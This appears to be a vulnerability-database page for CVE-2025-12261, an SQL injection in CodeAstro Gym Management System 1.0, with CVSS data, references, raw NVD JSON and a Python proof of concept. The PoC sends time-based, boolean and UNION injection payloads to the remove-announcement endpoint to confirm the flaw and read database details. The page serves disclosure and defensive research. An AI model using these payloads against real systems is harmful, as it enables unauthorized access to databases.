CVE-2025-12261

Description

A vulnerability was found in CodeAstro Gym Management System 1.0. This affects an unknown function of the file /admin/actions/remove-announcement.php. Performing a manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

CodeAstro Gym Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12261 SQL Injection PoC
# Target: CodeAstro Gym Management System 1.0
# File: /admin/actions/remove-announcement.php

def exploit_sqli(target_url, announcement_id):
    """
    SQL Injection PoC for CVE-2025-12261
    This PoC demonstrates boolean-based blind SQL injection
    """
    # Normal request to check if endpoint exists
    normal_payload = {
        'id': announcement_id
    }
    
    # SQL injection payloads for testing
    # Time-based blind SQL injection
    time_based_payload = {
        'id': f"{announcement_id}' AND SLEEP(5)-- -"
    }
    
    # Boolean-based blind SQL injection
    boolean_payload_true = {
        'id': f"{announcement_id}' AND 1=1-- -"
    }
    boolean_payload_false = {
        'id': f"{announcement_id}' AND 1=2-- -"
    }
    
    # UNION-based injection to extract data
    union_payload = {
        'id': f"{announcement_id}' UNION SELECT NULL,version(),user(),database()-- -"
    }
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Testing normal request...")
    
    try:
        # Test normal request
        response = requests.post(target_url, data=normal_payload, timeout=10)
        print(f"[+] Normal request status: {response.status_code}")
        
        # Test boolean-based injection
        print("[*] Testing boolean-based SQL injection...")
        resp_true = requests.post(target_url, data=boolean_payload_true, timeout=10)
        resp_false = requests.post(target_url, data=boolean_payload_false, timeout=10)
        
        if resp_true.text != resp_false.text:
            print("[!] Boolean-based SQL injection confirmed!")
        
        # Test UNION-based injection
        print("[*] Testing UNION-based SQL injection...")
        resp_union = requests.post(target_url, data=union_payload, timeout=10)
        print(f"[+] UNION injection response length: {len(resp_union.text)}")
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <announcement_id>")
        print(f"Example: python {sys.argv[0]} http://target.com/admin/actions/remove-announcement.php 1")
        sys.exit(1)
    
    target = sys.argv[1]
    aid = sys.argv[2]
    exploit_sqli(target, aid)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12261
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12261
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12261/
[4] VulDB https://vuldb.com/cve/CVE-2025-12261
[5] https://codeastro.com/
[6] https://github.com/JeromClown/cve/issues/1
[7] https://vuldb.com/?ctiid.329932
[8] https://vuldb.com/?id.329932
[9] https://vuldb.com/?submit.674022

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12261", "sourceIdentifier": "[email protected]", "published": "2025-10-27T10:15:39.003", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in CodeAstro Gym Management System 1.0. This affects an unknown function of the file /admin/actions/remove-announcement.php. Performing a manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codeastro:gym_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4BDAFA95-39E9-4D93-9228-7D9B51DE6A3F"}]}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/JeromClown/cve/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.329932", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329932", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.674022", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}